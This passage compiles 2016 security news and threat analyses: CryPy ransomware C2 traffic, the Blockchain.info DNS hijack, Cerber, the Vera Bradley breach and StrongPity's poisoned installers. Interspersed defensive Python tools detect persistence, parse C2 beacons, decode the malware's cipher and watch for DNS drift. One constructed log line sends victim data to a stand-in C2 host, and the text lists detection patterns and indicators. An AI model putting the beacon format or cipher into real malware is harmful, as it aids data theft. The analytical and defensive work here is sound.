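    ("Adobe_ReaderX", r"%TEMP%\mw.exe"),
    ("explore_", r"C:\Users\alice\Appdata\local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe"),
]

EXE_RE = re.compile(r'^"?(.+?\.exe)"?', re.I)                       # executable part, arguments dropped
TEMP_RE = re.compile(r"(^%TEMP%\\|\\Temp\\)", re.I)                    # launched from a temp directory
APPDATA_LOCAL_TOP_RE = re.compile(r"\\AppData\\Local\\[^\\]+\.exe$", re.I)  # no product sub-folder
GUID_NAME_RE = re.compile(r"\\[0-9A-Z]{8}(-[0-9A-Z]{4}){3}-[0-9A-Z]{12}\.exe$", re.I)


def triage_run_values(values):
    """Return (name, data, reasons) for every value showing at least one suspicious trait."""
    flagged = []
    for name, data in values:
        m = EXE_RE.match(data)
        exe = m.group(1) if m else data
        reasons = []
        if TEMP_RE.search(exe):
            reasons.append("runs from a temporary directory")
        if APPDATA_LOCAL_TOP_RE.search(exe):
            reasons.append("executable dropped directly in AppData\\Local")
        if GUID_NAME_RE.search(exe):
            reasons.append("GUID-like file name")
        if reasons:
            flagged.append((name, data, reasons))
    return flagged


def read_run_values():
    """On Windows, read the current user's Run key with winreg; elsewhere return []."""
    if sys.platform != "win32":
        return []
    import winreg
    values = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:          # raised once the last value has been enumerated
                return values
            values.append((name, str(data)))
            index += 1


if __name__ == "__main__":
    for entry in triage_run_values(read_run_values() or SAMPLE_RUN_VALUES):
        print(entry)
```

The heuristics are intentionally coarse: legitimate updaters do occasionally run from Temp, so the output is a triage list for a human, not a verdict. The value name is also worth a glance, since "Adobe_ReaderX" pointing at mw.exe is the kind of mismatch that no regex needs to catch.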

C2 Communication
The ransomware hides behind an Israeli web server that was compromised using an arbitrary-upload PHP shell script. The compromise and upload were possible because the server carried a vulnerable Magento CMS.

The executable transfers data over an unencrypted HTTP channel in clear-text. This allows for easy traffic inspection using a network listener. The following screenshot is the traffic being sent to the server:


Inspecting the Magento exploit and the compromised server, we found that the origin of the upload carries the title Pak Haxor – Auto Xploiter and the email ardiansyah09996@gmail[.]com, and that the file was uploaded in August 2016, which aligns with the case in question. The following screenshot reveals how attackers use mass exploiters that scan for vulnerable web servers and exploit the vulnerability, later visiting the servers to expand their control over them:


Part of such an exploitation technique is dropping additional PHP scripts to refine a more sophisticated attack, such as the CryPy ransomware.

One such script can be found hard-coded in the CryPy Python code, in the form of a GET request. The request is sent with two parameters to a script that was uploaded using the Auto Xploiter and carries the name victim.php. By reviewing the Python code it is easier to understand the type of data being presented in Base64 encoding format.


As seen in the screenshot above, the configurl parameter accepts a URL querystring where the victim_info input value of the info parameter is derived from the platform module.

platform.uname() returns a tuple of system, node, release, version, machine and processor values. These are encoded with Base64.

The next parameter is ip which contains the socket.gethostname() which basically collects an IP address.

The querystring is then sent to urllib.urlopen(), which sends a GET request to the selected server and reads the response content into glob_config.

The response contains a JSON format payload which is checked for the following keys:
x_ID – the victim’s unique ID to request their decryption keys after payment.
x_UDP – Not used; perhaps saved for future use.
x_PDP – Not used; perhaps saved for future use.

The second call is implemented in a function called generate_file() which is responsible for fetching a unique key for each file before encryption.

We have seen in recent lockers that, in order to demonstrate trust and integrity, the victim is able to decrypt one/two files before processing the payment. This proves decryptor validity. In order to randomly choose a file, the attacker must first generate a unique token for each one. The second PHP script found in the code is savekey.php which is described in the following screenshot and is suspected to have the C2 IP in it. It was however deleted long before we were able to reach it.


Like the first call, the second sends two parameters. The first is the file’s name and the other is the victim ID. In return, the server responds with two keys:
X – Unique key after encryption which will be appended to the file’s header.
Y – New filename which will be stored instead of the previous one.

These parameters are then sent to an encryption routine, along with the file’s original name.
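The victim.php check-in described above, as an added example that is not CryPy's own code: a parser that spots the GET in proxy logs and decodes the Base64 info parameter back into the uname() fields. The C2 host, log layout and uname values are constructed, and serialising the uname() tuple as its Python repr() is an assumption, since the write-up only says the values are Base64-encoded.

```python
import ast
import base64
import binascii
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed sample data. The C2 host is a placeholder and the uname values
# are made up. Serialising the platform.uname() tuple as its Python repr() is
# an assumption: the write-up only says the values are Base64-encoded.
_FAKE_UNAME = ("Windows", "WS-0417", "7", "6.1.7601", "AMD64", "Intel64 Family 6")
_FAKE_INFO = base64.b64encode(repr(_FAKE_UNAME).encode()).decode()
CONSTRUCTED_LOG = [
    "2016-10-11T09:12:03Z 10.0.4.17 GET http://c2.example.invalid/victim.php"
    "?info=" + _FAKE_INFO + "&ip=WS-0417 200",
    "2016-10-11T09:12:09Z 10.0.4.17 GET http://www.example.com/index.php?page=1 200",
    "2016-10-11T09:13:41Z 10.0.4.22 GET http://cdn.example.net/victim.php?x=1 404",
]
UNAME_FIELDS = ("system", "node", "release", "version", "machine", "processor")


def split_query(query: str) -> dict:
    """Split a querystring by hand: parse_qs would turn '+' into a space,
    and '+' is part of the Base64 alphabet used in the info value."""
    pairs = {}
    for item in query.split("&"):
        if "=" in item:
            key, value = item.split("=", 1)
            pairs[key] = unquote(value)
    return pairs


def decode_victim_info(b64: str):
    """Base64-decode the info parameter. Returns a tuple when the text parses
    as a Python tuple literal (the assumed layout), the raw text when it is
    valid UTF-8 but something else, and None when it is not Base64 at all."""
    try:
        raw = base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    try:
        value = ast.literal_eval(raw)
        if isinstance(value, tuple):
            return value
    except (ValueError, SyntaxError):
        pass
    return raw


def parse_crypy_beacon(url: str) -> Optional[dict]:
    """Return a structured record for a victim.php check-in, or None.
    A hit needs the script name plus both documented parameters (info, ip)."""
    parts = urlsplit(url)
    if not parts.path.endswith("/victim.php"):
        return None
    params = split_query(parts.query)
    if "info" not in params or "ip" not in params:
        return None
    info = decode_victim_info(params["info"])
    if info is None:
        return None
    record = {"c2_host": parts.hostname, "reported_host": params["ip"]}
    if isinstance(info, tuple) and len(info) == len(UNAME_FIELDS):
        record["victim_info"] = dict(zip(UNAME_FIELDS, info))
    else:
        record["victim_info"] = info
    return record


def scan_log(lines) -> list:
    """Run the beacon check over proxy log lines in the constructed
    'timestamp client METHOD url status' layout and return the hits."""
    hits = []
    for line in lines:
        cols = line.split()
        if len(cols) < 5 or cols[2] != "GET":
            continue
        record = parse_crypy_beacon(cols[3])
        if record is not None:
            record["timestamp"], record["client"] = cols[0], cols[1]
            hits.append(record)
    return hits


if __name__ == "__main__":
    for hit in scan_log(CONSTRUCTED_LOG):
        print(hit)
```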

REG Keys

8bd7cd1eee4594ad4886ac3f1a05273b crypy.exe
1ed3f127a0e94394ef049965bbc952ef encryptor.py

Bitcoin Wallet Blockchain.info went down due to a DNS Hijacking
13.10.2016 securityaffairs Hacking

Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service went down this week due to a DNS Hijacking attack.
Crypto-currencies continue to be a privileged target of cyber criminals; Bitcoin wallets and the services provided by the many companies operating in the industry have been targeted by criminal organizations as never before.

Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service, suffered a mysterious outage this week, and experts speculated that a cyber attack had disrupted the platform.

“Looks like our site is down. We’re working on it and should be back up soon.” reads the message displayed to the visitors during the downtime.

BlockChain informed its users about a possible DNS issue via Twitter.

Blockchain (@blockchain): “We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned.” (12:26, 12 Oct 2016)

“We’re making progress resolving the issue, but it may take upwards of several hours until services are fully restored,” states a second Tweet from the company while users were not able to access their online accounts.

At the same time, someone on Reddit reported the changes in the DNS records.

“It looks like blockchain.info has just had their domain name hijacked. The whois and DNS records suddenly jumped from CloudFlare to a cheap web host. From the cache, the names used to be
and were then changed to
Name Server: DED88057-1.HOSTWINDSDNS.COM
Name Server: DED88057-2.HOSTWINDSDNS.COM
when queried these are returning
blockchain.info. 11360 IN A
blockchain.info. 14400 IN A”


What happened?
The DNS server records for blockchain.info and blockchain.com were hijacked. Usually, this practice allows crooks to conduct phishing attacks in order to steal bitcoin wallet credentials.

Experts from OpenDNS detected the change in nameservers early:

dnsstream (@dnsstream): “critical: blockchain(.)info now has completely new nameservers (ded91868-1(.)hostwindsdns(.)com,ded91868-2(.)hostwindsdns(.)com)” (12:34, 12 Oct 2016)
Experts at OpenDNS investigated the IP changes:

OpenDNS blocked the above IPs to prevent its Bitcoin-using customers from falling victim to the scammers.

Fortunately, nothing happened to Blockchain users, but DNS hijacking is very dangerous because unaware users can be redirected to rogue websites that mimic the legitimate ones in an attempt to steal credentials.

Below is the official statement issued by the company about the incident:

“Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience.”

At the time of writing, there is no news regarding potential breaches of the users’ bitcoin wallets.

Experts observed several malvertising campaigns deliver Cerber 4.0
13.10.2016 securityaffairs Virus

Cerber 4.0 is the latest variant of the Cerber ransomware family, and it is becoming ever more common in malvertising campaigns in the wild.
Another variant of the notorious Cerber ransomware, the Cerber 4.0, appeared in the wild delivered by several exploit kits, including RIG, Neutrino, and Magnitude EKs.

According to the experts from Trend Micro, the Cerber 4.0 first appeared in October and became very popular in the criminal ecosystem where it is still used to power several malvertising campaigns.

The Cerber ransomware has evolved rapidly since it first appeared; it is considered one of the greatest successes of the Ransomware-as-a-Service (RaaS) model.

Cerber 4.0 was released in the wild a few weeks after version 3.0; it encrypts files and appends a randomly generated file extension (the previously used extensions were .cerber3, .cerber2 and .cerber).

The newest variant has shifted from an HTML ransom note to an HTA one.

The experts noticed that recently Cerber 4.0 is mainly dropped by the RIG toolkit, which is also the most active exploit kit of this period.

The RIG toolkit was observed for example in the PseudoDarkleech malvertising campaign that was previously seen distributing ransomware such as CrypMIC and CryptXXX.

“As we reported previously, Cerber has become one of the most prominent ransomware families of 2016. It has a wide range of capabilities and is often bought and sold as a service (ransomware-as-a-service or RaaS)—even earlier versions were peddled as RaaS in underground markets. The rapid release of Cerber updates have made it an increasingly popular payload for several exploit kits. ” reported TrendMicro.

The experts also noticed another malvertising campaign dropping the Cerber 4.0 via the Magnitude exploit kit. The campaign has been seen targeting devices in numerous Asian countries, including Taiwan, Korea, Hong Kong, Singapore, and China.

The experts noticed many other campaigns leveraging Cerber 4.0, including one that usually employs a casino-themed fake advertisement.


Another campaign started on October 3 is leveraging the Neutrino exploit kit to target users in the US, Germany, Spain, Taiwan, and Korea.

“Malvertising and exploit kits in general are being developed and improved constantly by cybercriminals, so keeping software updated with the latest security patches is critical for users and enterprises. This includes both the operating system and all applications being used. Make sure there is a security system in place that can proactively provide a comprehensive defense against attackers targeting new vulnerabilities,” Trend Micro researchers note.

Vera Bradley retail chain notifies customers of data breach
13.10.2016 securityaffairs Crime

The American retail chain Vera Bradley announced that hackers have stolen payment card data for an as-yet undetermined number of cards from its systems.
The American retail chain Vera Bradley is the latest victim of a data breach: the company announced that hackers have stolen payment card data for an as-yet undetermined number of cards.

The breach affected customers shopping at its 112 stores and 44 outlets in the period between 25 July and 23 September 2016. It seems that customers shopping on the official website were not impacted.

The FBI alerted Vera Bradley to the breach on 15 September; experts from the forensics firm Mandiant, who investigated the incident, confirmed the theft of credit card track data.

“On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue.” states the official announcement published by the company.

“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected. Findings from the investigation show unauthorised access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data,” added the company.

The hackers breached the company’s network and installed malware on its servers that exfiltrated payment card data.

“The program was specifically designed to find track data in the magnetic stripe of a payment card that may contain the card number, cardholder name, expiration date, and internal verification code – as the data was being routed through the affected payment systems.” states Vera Bradley.

Vera Bradley data-breach

Crooks accessed the card number, cardholder name, expiration date, internal verification code, and other information stored in the magnetic stripe track of the cards.

“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected.” reads the notice of data breach. “On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue. Findings from the investigation show unauthorized access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data.”

Vera Bradley confirmed that not all credit cards used during the period were exposed; in any case, it is important that customers monitor their bank accounts and promptly report any unauthorised card charges.

The company confirmed that it has stopped this incident and said that it is still working with the forensics security firm to improve the security of its systems and prevent similar incidents in the future.

This incident is the latest in a series of recent US retail chain breaches affecting the likes of Wendy’s, Hard Rock Hotel and Casino Las Vegas, and Eddie Bauer.

Trust me, I have a pen
13.10.2016 Kaspersky Security
Earlier today we became aware of a malicious website delivering Petya through the Hunter exploit kit. While there is nothing special about yet another exploit kit page, this one caught our attention because it mimics the index page of our sinkhole systems.


A malicious webpage faking one of our research systems

With cybercriminals increasingly trying to exploit trust relationships in cyberspace, it’s easy to get fooled by such attempts. We believe the criminals attempted to mimic our sinkhole systems in order to avoid being shut down by other researchers.

Just last week we were investigating a case of a serious attack that potentially breached a company. When we collected proof of the attack, we had to contact the company to help them isolate compromised systems and remediate. This brought us to a problem we commonly see today: the problem of trust.

When someone calls you and tries to convince you of something, your first reaction should be suspicion. In our investigations we normally deal with security personnel, who are highly paranoid people and do not trust anyone by nature. So far, the reaction of the company’s security staff was spot on: get the name of the caller, the company and department name, look up the company contacts using an independent, trusted, verifiable source, contact the company and confirm the facts, asking to connect to the researcher in the office immediately to do additional voice recognition. When that is done, the conversation can be resumed. Such a reaction and verification process is what we consider standard in our business. Unfortunately, we haven’t seen the same level of cautiousness among regular users.

A typical strategy for cybercriminals is to try to hide their tools, exploit kits and other malicious files on a compromised legitimate website or inject a malicious payload into a hijacked banner network account. Attackers also will rip entire websites, or just replace links to redirect visitors to attacker controlled sites, as we observed with the StrongPity watering holes. In this case, they simply counted on the confusion caused by visual appearance.

The fake webpage looks exactly the same as the original one from our research server and there is no point in finding even minor differences. Every webpage on the web can be copied and made to look identical to the source, except for the page’s original address or validated SSL certificate. PGPHtml is an alternative possibility, with each page explicitly stating its host domain or IP and then signed and verified with a public key. The server in question has been reportedly serving the Pony Trojan, hosting the Hunter Exploit Kit and distributing Petya ransomware.

We believe that this was the act of Russian-speaking cybercriminals, who send messages to our side every time their activities are affected by the work we do. We are bringing this to your attention to make you a little bit more cautious. Having said that, our first reaction was laughter, because it brought back some memories of an excellent short video on this matter shot by our colleagues from the security industry. And, because of this history of receiving messages from malware authors in their code and on sites, we think it is unlikely that this site is a watering hole targeting security researchers.

Unfortunately, this game of shadows is a well-known method not only in the criminal world but also in the world of advanced targeted attackers. We have seen in the past that some APT groups use deceptive tactics in order to try to confuse security researchers into wrong attribution. We have seen malware samples in the past where attackers from one group implanted decoys, trying to mimic the behaviour of their rivals. This is done to complicate the research process or consume extra time. The attribution process, being the hardest part of any computer investigation, can easily be driven in the wrong direction. However, we have been looking at these attempts for a long time and have learned to recognize such false flags. Now we would like you to be cautious and verify everything you see.

Related to this topic, our colleagues recently presented a more in-depth analysis of these techniques at VB 2016. You can read their entire paper here: Wave your false flags!

On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users
13.10.2016 Kaspersky APT
The StrongPity APT is a technically capable group that has operated under the radar for several years. The group has quietly deployed zero-days in the past, effectively spearphished targets, and maintains a modular toolset. What is most interesting about this group’s more recent activity, however, is its focus on users of encryption tools, peaking this summer. In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two. Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.

Encryption Tools
Clearly this APT is interested in encrypted data and communications. The tools targeted by this group enable practices for securing secrecy and integrity of data. For example, WinRAR packs and encrypts files with strong suites like AES-256, and TrueCrypt encrypts full hard drives all in one swoop. Both WinRAR and TrueCrypt help provide strong and reliable encryption. WinRAR enables a person to encrypt a file with AES-256 in CBC mode with a strong PBKDF2 HMAC-SHA256 based key. And, TrueCrypt provides an effective open-source full disk encryption solution for Windows, Apple, Linux, and Android systems. Using both of these tools together, a sort of one off, poor man’s end-to-end encryption can be maintained for free by putting these two solutions together with free file sharing services.

Other software applications help to support encrypted sessions and communications. Well known applications supporting end-to-end encryption are used by hundreds of millions of folks, sometimes unknowingly, every day. IM clients like Microsoft’s Skype implement 256-bit AES encrypted communications, while Putty, Winscp and Windows Remote Desktop help provide private communications and sessions with fully encrypted communications as well. Most of these communications across the wire are currently unbreakable when intercepted, at least, when the applications are configured properly.

Summer 2016 Watering Hole Resources and Trickery – WinRAR and TrueCrypt
This actor set up a particularly clever site to deliver trojanized WinRAR installers in the summer of 2016, appears to have compromised another, and this activity reminds us somewhat of the early 2014 Crouching Yeti activity. Many of the Crouching Yeti intrusions were enabled by trojanizing legitimate ICS-related IT software installers, such as SCADA environment VPN client installers and industrial camera software driver installers. Then, they would compromise the legitimate company software distribution sites and replace the legitimate installers with the Crouching Yeti trojanized versions. The tactics effectively compromised ICS and SCADA related facilities and networks around the world. Simply put, even when visiting a legitimate company distribution site, IT staff were downloading and installing ICS-focused malware. StrongPity’s efforts did much the same.

In the case of StrongPity, the attackers were not focused on ICS or SCADA. They set up a domain name (ralrab[.]com) mimicking the legitimate WinRAR distribution site (rarlab[.]com), and then placed links on a legitimate “certified distributor” site in Europe to redirect to their poisoned installers hosted on ralrab[.]com. In Belgium, the attackers placed a “recommended” link to their ralrab[.]com site in the middle of the localized WinRAR distribution page on winrar[.]be. The big blue recommended button (here in French) linked to the malicious installer, while all the other links on the page directed to legitimate software:


Winrar[.]be site with “recommended link” leading to malicious ralrab[.]com

The winrar[.]be site evaluated what “recommended” package a visitor might need based on browser localization and processor capability, and accordingly offered up the appropriate trojanized version. Installer resources named for French and Dutch versions, in 32-bit and 64-bit compiled executables, were provided over the summer:


Directory listing, poisoned StrongPity installers, at ralrab[.]com

The first observed visitor redirects from winrar[.]be to ralrab[.]com appeared on May 28th, 2016, from the Dutch-speaking version of the winrar.be site. Around the same time, another “certified distributor”, winrar[.]it, served trojanized installers as well. The major difference here is that we didn’t record redirections to ralrab[.]com; it appears the site directly served StrongPity trojanized installers:

The site started serving these executables a couple of days earlier, on 5/24, and a large majority of Italian visitors were affected.


Download page, winrar[.]it

Quite simply, the download links on this site directed visitors to trojanized WinRAR installers hosted from the winrar.it site itself. It’s interesting to note that both of the sites are “distributors”, where the sites are owned and managed not by rarlabs, but by local owners in individual countries.

StrongPity also directed specific visitors from popular, localized software sharing sites directly to their trojanized installers. This activity continued into late September 2016. In particular, the group redirected visitors from the software aggregation and sharing site tamindir[.]com to their attacker-controlled site at true-crypt[.]com. The StrongPity-controlled TrueCrypt site is a complete rip of the legitimate site, now hosted by SourceForge. Here is the Tamindir TrueCrypt page, which looks harmless enough.


TrueCrypt page, tamindir software sharing site

Unlike the newer poisoned WinRAR installers, StrongPity hosted several Much like the poisoned WinRAR installers, multiple filenames have been used to keep up with visitor interests. Visitors may have been directed to the site by other means and downloaded directly from the ripped and persuasive site.


true-crypt[.]com malicious StrongPity distribution site

At the very bottom of the page, there are a couple of links to the poisoned installers:

Referrers include these localized software aggregates and sharers:

It’s interesting that KSN recorded the appearance of the file on two unique systems in December 2015 and a third in January 2016, all in Turkey, and then nothing until May 2016. Then, deployment of the installers continued mostly within Turkey in July and September 2016.

Summer 2016 Watering Hole Victim Geolocations – WinRAR and TrueCrypt
Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred.
Accordingly, the country with the overwhelming number of detections was Italy, followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morocco, France, and Tunisia.


winrar[.]it StrongPity component geolocation distribution

In a similar time span, the more than sixty visitors redirected from winrar.be to ralrab.com for the malicious file download were overwhelmingly located in one country. The top countries directed to StrongPity malware from the winrar.be site from May 25th through the first few days of June are Belgium, Algeria, Morocco, Netherlands, Canada, Cote D’Ivoire, and Tunisia.


winrar[.]be StrongPity component geolocation distribution

StrongPity previously set up TrueCrypt themed watering holes in late 2015. But their offensive activity surged in late summer 2016. The group set up a site directly pulled from the contents of the legitimate TrueCrypt website. From mid July to early September, dozens of visitors were redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on systems in Turkey, with victims in the Netherlands as well.


tamindir[.]com to true-crypt[.]com poisoned TrueCrypt installer redirects

StrongPity Malware
The StrongPity droppers were often signed with unusual digital certificates, dropping multiple components that not only provide complete control of the victim system, but effectively steal disk contents, and can download components for further collection of various communications and contacts. Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.

When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.


In the case of the winrar[.]be/ralrab[.]com watering hole malware, each one of the six droppers that we observed created a similar set of dropped components on disk. And, in these cases, the attackers did not re-use their fake digital certificates. In addition to installing the legitimate version of WinRAR, the dropper installed the following StrongPity components:

Of these files, two are configurable and encrypted with the same keyless cipher: “wrlck.cab” and “prst.cab”. While one maintains several C2 callbacks for the backdoor to fetch more instructions and upload installed software and file paths, the other maintains something a bit more unusual. “prst.cab” maintains an encrypted list of programs that maintain encrypted connections. This simple encoding takes the most significant nibble of each character, swaps the nibbles of that byte, and xors the result against the original value. Its code looks something like this:

for (i = 0; i < len; i++) {
    x = s[i];              /* next byte of the buffer */
    j = ((x & 0xF0) >> 4); /* high nibble, moved down into the low nibble */
    y = x ^ j;             /* xor it against the original byte */
    out[i] = y;
}
Using that cipher in the ralrab[.]com malware, the package is configured to seek out several crypto-enabled software applications, highlighting the group’s interest in users of more encryption-supported software suites.

putty.exe (a windows SSH client)
filezilla.exe (supports ftps uploads)
winscp.exe (a windows secure copy application, providing encrypted and secure file transfer)
mstsc.exe (Windows Remote Desktop client, providing an encrypted connection to remote systems)
mRemoteNG.exe (a remote connections manager supporting SSH, RDP, and other encrypted protocols)
Also included in StrongPity components are keyloggers and additional data stealers.
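The keyless cipher above, turned into a decoder for the prst.cab program list (an added example, not StrongPity's code). Because the high nibble survives the transform untouched, applying it twice restores the input, so one function both encodes and decodes; the NUL-separated layout of the list and the sample blob are assumptions constructed from the five programs named above.

```python
def nibble_xor_transform(data: bytes) -> bytes:
    """For each byte x: take the high nibble, shift it down, xor it into x.
    The high nibble itself is unchanged, so the low nibble comes back when
    the same step is applied again: the transform is its own inverse."""
    return bytes(x ^ ((x & 0xF0) >> 4) for x in data)


def decode_program_list(blob: bytes) -> list:
    """Decode a prst.cab-style blob and split it into program names.
    Assumed layout: NUL-separated ASCII names; junk chunks are dropped."""
    plain = nibble_xor_transform(blob)
    names = []
    for chunk in plain.split(b"\x00"):
        if not chunk:
            continue
        try:
            text = chunk.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            names.append(text)
    return names


# Constructed sample: the five targeted programs from the write-up, encoded
# with the same transform (no separate encoder is needed, see above).
TARGETED = ["putty.exe", "filezilla.exe", "winscp.exe", "mstsc.exe", "mRemoteNG.exe"]
CONSTRUCTED_BLOB = nibble_xor_transform(
    b"\x00".join(name.encode("ascii") for name in TARGETED) + b"\x00"
)


if __name__ == "__main__":
    print(CONSTRUCTED_BLOB)               # unreadable on disk
    print(decode_program_list(CONSTRUCTED_BLOB))
```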

Widely available, strong cryptography software tools help provide secure and private communications that are now easily obtained and usable. In the summer of 2016, multiple encryption-enabled software applications were targeted with watering hole, social engineering tactics, and spyware by the StrongPity APT. While watering holes and poisoned installers are tactics that have been effectively used by other APT, we have never seen the same focus on cryptographic-enabled software. When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers. We have seen other APT such as Crouching Yeti and Darkhotel distribute poisoned installers and poisoned executable code, then redistribute them through similar tactics and over p2p networks. Hopefully, simpler verification systems than the current batch of PGP and SSL applications will arise to be adopted in larger numbers. Until then, strong anti-malware and dynamic whitelisting solutions will be more necessary than ever.

BlockChain.info Domain Hijacked; Site Goes Down; 8 Million Bitcoin Wallets Inaccessible
13.10.2016 thehackernews Hacking
UPDATE: The site is back and working. Blockchain team released a statement via Twitter, which has been added at the end of this article.
If you are fascinated with the idea of digital currency, then you might have heard about BlockChain.Info.
It’s Down!
Yes, Blockchain.info, the world's most popular Bitcoin wallet and Block Explorer service, has been down for the last few hours, and it's believed that a cyber attack has disrupted the site.
The site is down at the time of writing, and the web server reports a bad gateway error, with a message on the website that reads:
"Looks like our site is down. We're working on it and should be back up soon."
With more than 8 million Digital Wallet customers, BlockChain is users' favorite destination to see recent transactions, stats on mined blocks and bitcoin economy charts.
A few hours ago, BlockChain team tweeted about the sudden breakdown of the site, saying: "We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned."
"We're making progress resolving the issue, but it may take upwards of several hours until services are fully restored," another tweet reads.
However, a Reddit user has noted that "The whois and DNS records suddenly jumped from CloudFlare to a cheap web host."
It seems that their domain name has been hijacked, which was later confirmed by the BlockChain team on Reddit, saying:
"Hey everyone, our DNS provider was targeted. It's going to be several hours before our services are fully restored. The CloudFlare DNS is propagating now."
Until the issue is resolved, which may take a few more hours, Blockchain.info digital wallet users will not be able to access their online accounts. Blockchain users are hoping that their online wallets have not been hacked and their funds not stolen.
Since its DNS server has been hijacked, it could be possible that an attacker can host a fake web page on the same domain in an effort to steal your bitcoin wallet credentials.
So, Blockchain users are strongly recommended not to log in to the site until the Blockchain team releases an official statement via its Twitter account.
Official Statement From BlockChain:
"Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience."
However, there is no statement from the Blockchain.info team that suggests any hacking or compromise of its users' bitcoin wallets.
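A delegation-drift check of the kind that flagged this incident, serving both this article and the securityaffairs write-up of the same outage above; it is an added example, not Blockchain's, OpenDNS's or dnsstream's tooling. It parses dig-style answer lines like the ones quoted on Reddit and classifies a nameserver change by whether any of the new servers still belong to a known provider. The baseline CloudFlare nameserver names and the rogue A record address are placeholders, since the page does not preserve them.

```python
import re

# dig-style answer line: owner, TTL, class, type, rdata (the layout the
# Reddit post above was reading).
DIG_LINE = re.compile(
    r"^(?P<owner>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<rrtype>[A-Z]+)\s+(?P<rdata>\S+)$"
)

# Constructed sample: the hijacked delegation as quoted above, plus a
# documentation-range address standing in for the rogue host's IP.
CONSTRUCTED_DIG_ANSWER = """\
blockchain.info.  14400  IN  NS  DED88057-1.HOSTWINDSDNS.COM.
blockchain.info.  14400  IN  NS  DED88057-2.HOSTWINDSDNS.COM.
blockchain.info.  11360  IN  A   192.0.2.10
"""
# Placeholder baseline: the page does not preserve the original CloudFlare
# nameserver names, so these stand in for the last known-good delegation.
BASELINE_NS = ["ns-a.cloudflare-placeholder.example.",
               "ns-b.cloudflare-placeholder.example."]


def parse_dig_answer(text: str, rrtype: str) -> list:
    """Pull the rdata of one record type out of dig-style answer lines."""
    found = []
    for line in text.splitlines():
        match = DIG_LINE.match(line.strip())
        if match and match.group("rrtype") == rrtype:
            found.append(match.group("rdata"))
    return found


def normalize_names(names) -> frozenset:
    """Case-fold, strip the trailing dot and drop blanks so that cosmetic
    differences between lookups do not register as a change."""
    return frozenset(n.strip().lower().rstrip(".") for n in names if n.strip())


def provider_of(ns_name: str) -> str:
    """Approximate the DNS provider by the last two labels of the NS name
    (hostwindsdns.com, cloudflare.com, ...); enough for a drift check."""
    return ".".join(ns_name.lower().rstrip(".").split(".")[-2:])


def assess_delegation(domain: str, baseline_ns, observed_ns) -> dict:
    """Compare the observed NS set with the baseline.
    ok:       identical sets
    error:    empty answer, the lookup failed; draw no conclusion
    warning:  changed, but some nameserver still belongs to a baseline provider
    critical: every nameserver moved to a provider never seen before, the
              registrar-account-compromise pattern described above"""
    base, obs = normalize_names(baseline_ns), normalize_names(observed_ns)
    if obs == base:
        severity = "ok"
    elif not obs:
        severity = "error"
    elif {provider_of(n) for n in base}.isdisjoint({provider_of(n) for n in obs}):
        severity = "critical"
    else:
        severity = "warning"
    return {"domain": domain, "severity": severity,
            "added": sorted(obs - base), "removed": sorted(base - obs)}


if __name__ == "__main__":
    observed = parse_dig_answer(CONSTRUCTED_DIG_ANSWER, "NS")
    print(assess_delegation("blockchain.info", BASELINE_NS, observed))
```

Real input for parse_dig_answer is the output of `dig +noall +answer NS <domain>`, run from a scheduled job against a stored baseline.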

Researchers Demonstrated How NSA Broke Trillions of Encrypted Connections
12.10.2016 thehackernews  BigBrothers
In the year 2014, we came to know about the NSA's ability to break Trillions of encrypted connections by exploiting common implementations of the Diffie-Hellman key exchange algorithm – thanks to classified documents leaked by ex-NSA employee Edward Snowden.
At that time, computer scientists and senior cryptographers had presented the most plausible theory: only a few prime numbers were in common use (by 92 percent of the top 1 Million Alexa HTTPS domains), so breaking them might have fit well within the NSA's $11 Billion-per-year budget dedicated to "groundbreaking cryptanalytic capabilities."
